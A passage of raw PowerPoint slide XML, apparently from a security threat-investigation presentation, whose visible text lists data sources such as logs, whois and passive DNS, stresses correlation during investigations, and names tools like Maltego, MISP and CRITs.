                  <a:cs typeface="Droid Sans Fallback" charset="0"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="r" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="002541"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Rambla" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Logs</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E2BE69E-1632-F646-BA63-3D7A338AD3DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5578475" y="6154738"/>
              <a:ext cx="2193925" cy="33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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="r" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="002541"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Rambla" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Published reports</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8726E7B0-098D-D245-A4D2-7CA234576766}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4478338" y="5434013"/>
              <a:ext cx="1535112" cy="33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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="r" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="002541"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Rambla" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Web searches</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE66E703-FCF7-2845-9180-DFD478E496B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7713663" y="5394325"/>
              <a:ext cx="881062" cy="33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chemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Droid Sans Fallback" charset="0"/>
                  <a:cs typeface="Droid Sans Fallback" charset="0"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="r" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="002541"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Rambla" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>whois</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFA50D4D-3755-7B47-880E-398AD1C20660}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7132638" y="5668963"/>
              <a:ext cx="1614487" cy="33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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="r" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="002541"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Rambla" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Passive DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F8E1CA0-AA94-D443-A85B-A5DCD53F2E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3698" r="33154"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6316663" y="3709988"/>
              <a:ext cx="1700212" cy="1463675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:blipFill dpi="0" rotWithShape="0">
                    <a:blip/>
                    <a:srcRect t="13698" r="33154"/>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xnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="37" name="Straight Arrow Connector 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31636684-4B59-8142-9ED5-FA02B17EAA5E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5847519" y="4985675"/>
              <a:ext cx="286171" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B8FF"/>
            </a:solidFill>
            <a:ln w="381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 name="Straight Arrow Connector 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06B7EFDC-979F-A347-A8D6-545025092B32}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="6013450" y="5229200"/>
              <a:ext cx="303213" cy="360040"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B8FF"/>
            </a:solidFill>
            <a:ln w="381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 name="Straight Arrow Connector 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BC2FEA5-C987-8741-A83E-822926B4FF9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="6523830" y="5248276"/>
              <a:ext cx="208410" cy="588962"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B8FF"/>
            </a:solidFill>
            <a:ln w="381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Straight Arrow Connector 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{289F6651-0FCF-9146-B5CD-5D8DEA9C60AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="7103204" y="5246354"/>
              <a:ext cx="27970" cy="837614"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B8FF"/>
            </a:solidFill>
            <a:ln w="381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1" name="Straight Arrow Connector 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68E9F9C1-73C3-B942-9297-372E17661DC0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="7502138" y="5243117"/>
              <a:ext cx="139352" cy="487758"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B8FF"/>
            </a:solidFill>
            <a:ln w="381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2" name="Straight Arrow Connector 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A2D6650-7E15-5240-8618-9BDFFF8EEBA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="7831396" y="5223209"/>
              <a:ext cx="179594" cy="263787"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B8FF"/>
            </a:solidFill>
            <a:ln w="381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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D5C61B4-BA19-2440-ADE6-C45AB9AE669D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Correlation Is Central to the Investigation Phase </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29698" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0683F3DD-B0E0-4047-80EC-305542917EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8256587" cy="430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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Better understanding based on new input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discover new facts based on initial information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Spot patterns and identify unforeseen relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Correlate from other sources for verification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29699" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6598D219-D9BD-F343-9DD8-086692F2F07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9746" t="30571" r="25600" b="21404"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2549525" y="3735388"/>
            <a:ext cx="4043363" cy="2219325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:blipFill dpi="0" rotWithShape="0">
                  <a:blip/>
                  <a:srcRect l="19746" t="30571" r="25600" b="21404"/>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slow">
    <p:fade thruBlk="1"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23DD9057-C3D7-1046-8DD9-3E2D2999D3F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Correlation Is Central to the Investigation Phase </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31746" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2D16C04-117E-5A43-8D12-C861FBBDD3F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8693150" cy="430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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Leverage tools to minimize analysis time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cross-platform or web-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Command-line interface over GUI if possible to automate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Graph-based visualization tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Maltego, commercial platforms, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Also: MISP, CRITs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31747" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D29B235-21CF-B74F-98C4-71F6729FAE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9746" t="30571" r="25600" b="21404"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2549525" y="3919538"/>
            <a:ext cx="4043363" cy="2219325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:blipFill dpi="0" rotWithShape="0">
                  <a:blip/>
                  <a:srcRect l="19746" t="30571" r="25600" b="21404"/>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slow">
    <p:fade thruBlk="1"/>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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BCD7BE6-2692-DA45-9321-022D0314347D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Typical tooling to support investigations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33794" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBABAA64-9509-8743-98A8-E13708BB00E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8693150" cy="430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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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2pPr>
            <a:lvl3pPr marL="647700" indent="-2159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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Automation of some steps, triggered by an analyst</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
